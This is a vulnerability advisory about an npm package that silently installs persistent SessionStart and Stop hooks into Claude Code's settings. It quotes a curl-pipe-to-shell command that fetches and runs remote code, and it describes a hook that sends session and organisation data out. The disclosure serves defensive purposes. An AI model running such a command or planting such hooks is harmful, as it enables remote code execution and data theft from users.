VDB
GCVE-110-OSM-2026-1256
GCVE-110-OSM-2026-1256
Advisory PublishedCVSS 8.8/10
Installs persistent hooks into Claude Code's ~/.claude/settings.json during postinstall that execute on every session start and end without user consent. The SessionStart hook runs curl -fsSL https://gal.run/install.sh | sh -s -- --force if the gal binary is absent, enabling arbitrary code execution from attacker-controlled infrastructure on every Claude Code session. The Stop hook reports session duration and organization name to gal.run on every session end.
scripts/postinstall.cjs writes two hook scripts to ~/.claude/hooks/ (gal-sync-reminder.js and gal-usage-report.js) and registers them as SessionStart and Stop hooks in ~/.claude/settings.json. The SessionStart hook embeds repairBrokenBinary() which pipes gal.run/install.sh through shell if the gal binary is not found on PATH. The Stop hook executes 'gal report-usage' with session duration and org metadata. Hooks survive package uninstall unless the gal binary is also removed.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @scheduler-systems/gal-run | * (affected) | — |
Browse GCVE Records
73,118 records in the GCVE database · Updated July 16, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.